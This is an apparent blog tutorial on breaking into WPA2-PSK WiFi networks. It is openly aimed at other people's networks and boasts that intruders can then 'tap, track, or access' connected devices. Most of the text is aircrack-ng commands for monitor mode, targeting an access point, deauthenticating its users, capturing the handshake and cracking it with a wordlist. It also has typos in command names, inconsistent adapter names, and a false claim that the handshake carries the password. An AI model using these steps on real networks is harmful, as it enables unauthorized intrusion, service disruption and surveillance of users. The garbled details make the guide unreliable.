Intro to Wirelesss Hacking
People developed wireless facility to provide internet connection in 1990s under the type of WEP( Wired Equivalent Privacy) but nope , geniuses like you created number of ways to crack it. So after so much of grinding over the encryption concept by the computer scientist and cybersecurity analyst and researchers they came up with the concept of of WPA2-PSK.
WPA2-PSK is WiFi Protected Access 2 along with a pre-shared key for wireless security, now here , WPA2 holds a stronger encryption algorithm and AES which is very tough to crack but again geniuses like you love to tear apart each and every obstacle coming up in their way, then who the hell is stopping you, we have the solution here , read it step by step and finish off this mountain too.
But yes, one has to be purely technical to get this obstacle done because penetrating and getting access to someone’s network isn’t small stuff. Once you’re done getting in, you can tap, track, or access any of the devices connected to that network.
Basic Algorithm behind the hack
The vulnerability or loophole in a WPA2-PSK system is that the password which is encrypted is embedded in the 4-way handshake. When a user authenticates to the access point( for kiddos: when you try to connect to a wifi), the user and the access point(AP) go through a password matching session or in a technical language we can say, a 4 step- process to authenticate the user to the access point. At that point of time our machine using a hardware tool which we will discuss next , tries to grab the password by matching it through our own list of words.
Step 1: Initiating Monitor mode
First, we have to put the wifi adapter (compatible one: Leoxys 150N, ,Alpha 150 mbps(recommended one) and Alpha 1900(best one)) in monitor mode. In easy words, we can say putting our technical arm into the air through which all the air-traffic of wireless networks are floating and passing by.
We can do it by opening the terminal and typing:
$: airmong-ng start wlan0
our wlan0 adapter will be renamed as wlan0mon by the airmon-ng
Step 2: Capturing wireless traffic
This is done in order to capture all the traffic in the air that passes by, it is done by our adapter. For this we take help from the command airodump-ng.
$: airodump-ng mon0
This command collects all the critical information of the wireless traffic in that particular area such as BSSID, number of beacon frames, power, channel , speed and encryption.
Step 3: Targeting the AP we want
In this step we have to target the access point that we want or capture the critical data. For this we will be needing the BSSID and channel of the targetted access point(AP) to do this. This is carried out by opening an another terminal and processing the below command:
$: airodump-ng –bssid C4:9F:4C:F8:0F:7F -c 11 –write WPAcrack mon0
C4:9F:4C:F8:0F:7F is the BSSID of the wifi
-c 11 is the channel of the AP we are working upon
WPAcrack is the file in which our pass will be saved
mon0 is the name of the adapter
Now in the above image , we can see , it has started focussing on only one AP which we want to crack and get its password..
Step 4: Using Airplay-Ng for Deauth
Now, to capture the encrypted password, we need to have the user to authenticate against the access point. If they’re already authenticated then we can just de-authenticate them and their device will automatically re-authenticate, meanwhile we can grab their encrypted password in the process. For this, we have open another terminal and execute the below command:
$> aireplay-ng –deauth 100 -a C4:9F:4C:F8:0F:7F mon0
100 is the frames of de-authentication which we are sending
C4:9F:4C:F8:0F:7F is the BSSID of the access point
mon0 is the name of our adapter
Step 5: Capturing the handshake
Now, in the previous step we made the user to disconnect from their wifi network to reconnect and now while reconnection by the user’s device to the AP or WiFi , airodump-ng will attempt to grab the wifi password. For this lets get back to our airodump-ng terminal and right there we would be able to see WPA handshake. This is signal that we were successfull in getting the password which is in an encrypted form.
Step 6: Decrypting the encrypted password
Now, we will be again using our main weapon command aircrack-ng to decrypt the encrypted password which we grabbed from the re-authenticatoin between the user and the AP. Now, this process depends upon how strong is our dictionary file or wordlist file. In easy words, we can say a list of different combination of words. This can be done by executing the below command
aircrack-ng WPAcrack-02.cap -w rockyou.txt
here , WPAcrack-02.cap is the file name in which we wrote the airodump-ng command
-w rockyou.txt is our file containing list of passwords
After this process, it all depends upon our system processing speed, GPU , the wifi adapter we are using and the most important the password length and character types used in it. Password with more than 8 length including possible combinations of upper case, lower case and special symbols+numbers take alot of time. After this process a message on the terminal appears with the password.